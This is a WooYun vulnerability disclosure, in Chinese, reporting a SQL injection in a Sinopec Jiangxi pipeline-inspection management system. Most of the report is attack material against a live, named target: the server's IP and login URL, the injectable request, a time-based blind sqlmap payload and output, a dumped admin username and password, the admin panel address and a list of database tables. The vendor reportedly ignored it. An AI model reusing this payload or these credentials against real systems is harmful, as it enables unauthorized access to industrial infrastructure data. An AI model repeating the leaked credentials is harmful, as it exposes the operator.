当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117682

漏洞标题:中国石油化某系统sql注入

相关厂商:中国石油化工股份有限公司

漏洞作者: 路人甲

提交时间:2015-06-02 11:52

修复时间:2015-06-07 11:54

公开时间:2015-06-07 11:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

15

详细说明:

15

漏洞证明:

上地址:
http://120.203.228.129/shihua/#
中石化江西管道巡检管理系统
post数据:
GET /shihua/login.php?user=admin&psw=111 HTTP/1.0
Host: 120.203.228.129
Proxy-Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://120.203.228.129/shihua/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
注入类型:
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: user (GET)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: user=admin' AND SLEEP(5) AND 'kaQc'='kaQc&psw=111
---
[01:00:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[01:00:00] [INFO] fetching columns for table 'system_admin' in database 'shihua'
[01:00:00] [WARNING] time-based comparison requires larger statistical model, pl
跑出admin

360截图20150602011301154.jpg


Database: shihua
Table: system_admin
[1 entry]
+----+-------+--------+---------+
| id | Psw | User | Project |
+----+-------+--------+---------+
| 1 | nimda | admin | 1 |
+----+-------+--------+---------+
成功登入:

360截图20150602011342130.jpg


360截图20150602011413689.jpg


http://120.203.228.129/shihua/admin.html 后台管理

360截图20150602011503046.jpg


360截图20150602011518053.jpg


泄露终端信息:

360截图20150602011541030.jpg


其他表:
[00:43:07] [INFO] retrieved: location_event
[00:44:19] [INFO] retrieved: location_event2
[00:44:40] [INFO] retrieved: location_record
[00:45:19] [INFO] retrieved: location_record_all
[00:45:57] [INFO] retrieved: location_uppic
[00:46:34] [INFO] retrieved: location_upvideo
[00:47:12] [INFO] retrieved: location_upvoice
[00:47:44] [INFO] retrieved: map_markinfo
[00:48:43] [INFO] retrieved: shihua_ParallelLines
[00:50:19] [INFO] retrieved: shihua_Voltage
[00:51:02] [INFO] retrieved: shihua_bijindian
[00:51:51] [INFO] retrieved: shihua_bijindianline
[00:52:29] [INFO] retrieved: shihua_moving
[00:53:09] [INFO] retrieved: shihua_noscan
[00:53:47] [INFO] retrieved: shihua_parallellines
[00:54:59] [INFO] retrieved: shihua_pipe
[00:55:23] [INFO] retrieved: shihua_pipeline
[00:55:56] [INFO] retrieved: shihua_pipeline2
[00:56:18] [INFO] retrieved: shihua_statistics
[00:57:13] [INFO] retrieved: system_admin
[00:58:08] [INFO] retrieved: system_device
[00:58:43] [INFO] retrieved: system_device_h
跑太慢了。就不继续了

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-07 11:54

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无